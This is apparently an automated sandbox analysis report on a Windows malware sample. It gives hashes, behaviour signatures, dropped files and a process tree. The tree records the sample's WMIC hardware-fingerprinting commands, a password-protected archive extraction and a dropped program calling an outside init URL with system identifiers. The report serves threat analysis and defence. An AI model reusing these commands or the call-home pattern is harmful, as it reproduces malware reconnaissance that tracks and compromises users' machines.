117ff6b0078f6d910e5b5b0e7d77387ed9dd59e30185023b5fb886ac4f490d73

Analysis

max time kernel
117s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
26/12/2023, 14:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

76e19b881b28e526acb84383479179e4.exe
Size

406KB
MD5

76e19b881b28e526acb84383479179e4
SHA1

4771910f19703059a347bfdb284a79383a17289f
SHA256

117ff6b0078f6d910e5b5b0e7d77387ed9dd59e30185023b5fb886ac4f490d73
SHA512

46388e613b382ae63394e61a9be6cb4418405d3d9bd7280c258e8a13f912b297844446a6dd3243cb6c394569e7d2d312c8b36dc4d0d61992a7ad28c61b0c3287
SSDEEP

12288:nA0i50G093ZvFEcV6dfRiBB4KlrbbmWzDhy:nAfyGqpvFEJdfS4oTDD0

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2240	7za.exe
1352	setupcl.exe

Loads dropped DLL 5 IoCs

pid	Process
2060	76e19b881b28e526acb84383479179e4.exe
2060	76e19b881b28e526acb84383479179e4.exe
2060	76e19b881b28e526acb84383479179e4.exe
2060	76e19b881b28e526acb84383479179e4.exe
2060	76e19b881b28e526acb84383479179e4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1876	WMIC.exe
Token: SeSecurityPrivilege	1876	WMIC.exe
Token: SeTakeOwnershipPrivilege	1876	WMIC.exe
Token: SeLoadDriverPrivilege	1876	WMIC.exe
Token: SeSystemProfilePrivilege	1876	WMIC.exe
Token: SeSystemtimePrivilege	1876	WMIC.exe
Token: SeProfSingleProcessPrivilege	1876	WMIC.exe
Token: SeIncBasePriorityPrivilege	1876	WMIC.exe
Token: SeCreatePagefilePrivilege	1876	WMIC.exe
Token: SeBackupPrivilege	1876	WMIC.exe
Token: SeRestorePrivilege	1876	WMIC.exe
Token: SeShutdownPrivilege	1876	WMIC.exe
Token: SeDebugPrivilege	1876	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1876	WMIC.exe
Token: SeRemoteShutdownPrivilege	1876	WMIC.exe
Token: SeUndockPrivilege	1876	WMIC.exe
Token: SeManageVolumePrivilege	1876	WMIC.exe
Token: 33	1876	WMIC.exe
Token: 34	1876	WMIC.exe
Token: 35	1876	WMIC.exe
Token: 36	1876	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1876	WMIC.exe
Token: SeSecurityPrivilege	1876	WMIC.exe
Token: SeTakeOwnershipPrivilege	1876	WMIC.exe
Token: SeLoadDriverPrivilege	1876	WMIC.exe
Token: SeSystemProfilePrivilege	1876	WMIC.exe
Token: SeSystemtimePrivilege	1876	WMIC.exe
Token: SeProfSingleProcessPrivilege	1876	WMIC.exe
Token: SeIncBasePriorityPrivilege	1876	WMIC.exe
Token: SeCreatePagefilePrivilege	1876	WMIC.exe
Token: SeBackupPrivilege	1876	WMIC.exe
Token: SeRestorePrivilege	1876	WMIC.exe
Token: SeShutdownPrivilege	1876	WMIC.exe
Token: SeDebugPrivilege	1876	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1876	WMIC.exe
Token: SeRemoteShutdownPrivilege	1876	WMIC.exe
Token: SeUndockPrivilege	1876	WMIC.exe
Token: SeManageVolumePrivilege	1876	WMIC.exe
Token: 33	1876	WMIC.exe
Token: 34	1876	WMIC.exe
Token: 35	1876	WMIC.exe
Token: 36	1876	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3228	WMIC.exe
Token: SeSecurityPrivilege	3228	WMIC.exe
Token: SeTakeOwnershipPrivilege	3228	WMIC.exe
Token: SeLoadDriverPrivilege	3228	WMIC.exe
Token: SeSystemProfilePrivilege	3228	WMIC.exe
Token: SeSystemtimePrivilege	3228	WMIC.exe
Token: SeProfSingleProcessPrivilege	3228	WMIC.exe
Token: SeIncBasePriorityPrivilege	3228	WMIC.exe
Token: SeCreatePagefilePrivilege	3228	WMIC.exe
Token: SeBackupPrivilege	3228	WMIC.exe
Token: SeRestorePrivilege	3228	WMIC.exe
Token: SeShutdownPrivilege	3228	WMIC.exe
Token: SeDebugPrivilege	3228	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3228	WMIC.exe
Token: SeRemoteShutdownPrivilege	3228	WMIC.exe
Token: SeUndockPrivilege	3228	WMIC.exe
Token: SeManageVolumePrivilege	3228	WMIC.exe
Token: 33	3228	WMIC.exe
Token: 34	3228	WMIC.exe
Token: 35	3228	WMIC.exe
Token: 36	3228	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3228	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1352	setupcl.exe
1352	setupcl.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 1876	2060	76e19b881b28e526acb84383479179e4.exe	88
PID 2060 wrote to memory of 1876	2060	76e19b881b28e526acb84383479179e4.exe	88
PID 2060 wrote to memory of 1876	2060	76e19b881b28e526acb84383479179e4.exe	88
PID 2060 wrote to memory of 3228	2060	76e19b881b28e526acb84383479179e4.exe	92
PID 2060 wrote to memory of 3228	2060	76e19b881b28e526acb84383479179e4.exe	92
PID 2060 wrote to memory of 3228	2060	76e19b881b28e526acb84383479179e4.exe	92
PID 2060 wrote to memory of 3248	2060	76e19b881b28e526acb84383479179e4.exe	96
PID 2060 wrote to memory of 3248	2060	76e19b881b28e526acb84383479179e4.exe	96
PID 2060 wrote to memory of 3248	2060	76e19b881b28e526acb84383479179e4.exe	96
PID 2060 wrote to memory of 2884	2060	76e19b881b28e526acb84383479179e4.exe	98
PID 2060 wrote to memory of 2884	2060	76e19b881b28e526acb84383479179e4.exe	98
PID 2060 wrote to memory of 2884	2060	76e19b881b28e526acb84383479179e4.exe	98
PID 2060 wrote to memory of 2240	2060	76e19b881b28e526acb84383479179e4.exe	100
PID 2060 wrote to memory of 2240	2060	76e19b881b28e526acb84383479179e4.exe	100
PID 2060 wrote to memory of 2240	2060	76e19b881b28e526acb84383479179e4.exe	100
PID 2060 wrote to memory of 1352	2060	76e19b881b28e526acb84383479179e4.exe	102
PID 2060 wrote to memory of 1352	2060	76e19b881b28e526acb84383479179e4.exe	102
PID 2060 wrote to memory of 1352	2060	76e19b881b28e526acb84383479179e4.exe	102
PID 1352 wrote to memory of 2768	1352	setupcl.exe	103
PID 1352 wrote to memory of 2768	1352	setupcl.exe	103
PID 1352 wrote to memory of 2768	1352	setupcl.exe	103

C:\Users\Admin\AppData\Local\Temp\76e19b881b28e526acb84383479179e4.exe
"C:\Users\Admin\AppData\Local\Temp\76e19b881b28e526acb84383479179e4.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1876
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3228
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get Version /FORMAT:textvaluelist.xsl
  2⤵
  PID:3248
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
  2⤵
  PID:2884
- C:\Users\Admin\AppData\Local\Temp\nsp5371.tmp\7za.exe
  7za.exe e -y -p"5545b2f3828117f6373c5ddd9459aaac" [RANDOM_STRING].7z
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Users\Admin\AppData\Local\Temp\nsp5371.tmp\setupcl.exe
  "C:\Users\Admin\AppData\Local\Temp\nsp5371.tmp\setupcl.exe" /initurl http://sub.chbullan.com/init/76e19b881b28e526acb84383479179e4/:uid:? /affid "-" /id "0" /name " " /uniqid 76e19b881b28e526acb84383479179e4 /uuid 00000000-0000-0000-0000-000000000000 /biosserial /biosversion ROCKS - 1 /csname Standard PC (Q35 + ICH9, 2009)
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1352
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic bios get serialnumber, version
    3⤵
    PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsp5371.tmp\7za.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp5371.tmp\[RANDOM_STRING].7z

Filesize
80KB

MD5
6de6d5730aac89df5c7822032e70a2df

SHA1
a990abac3d413e2487d3e925e9e6553aa251a25f

SHA256
12fd4dd3a0285cc87b996ee36d96084b20f07ff33e73a1e912307e46e7cf9b6e

SHA512
970e3f5021636a5773bf93f0f1d2ba860d4fdeebe3f4e5639dd02a9db5f9757956020d2b7136015eb3afa2e329aeca21f9732df8d8482277f68890fc6542e5c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp5371.tmp\nsExec.dll

Filesize
8KB

MD5
b8be6632a7dc8136ff01338be40fe701

SHA1
043fa16929b2af5ed5c1c59b4035a10cf765fb43

SHA256
289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085

SHA512
403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp5371.tmp\setupcl.exe

Filesize
193KB

MD5
10bd2af1b07ec6bc9cd17ba512569e59

SHA1
807e17ab1b98177e135d30941b45081960d1e866

SHA256
9c620ef6eac3d0d9d3f6f2622a53d1f543cebd93846636ba397683962c07fc7c

SHA512
deacd041f12b6ec74f9e4488874ce962037990ed0ae424aaeabf2c35876b2ebbb943f92e9a4ffe504718bb00021209b035439ea4d7c64a4031b86ce9104ce3ed

Download Submit
memory/1352-36-0x0000000000490000-0x0000000000491000-memory.dmp

Filesize
4KB

Download
memory/1352-37-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/1352-38-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/2060-35-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download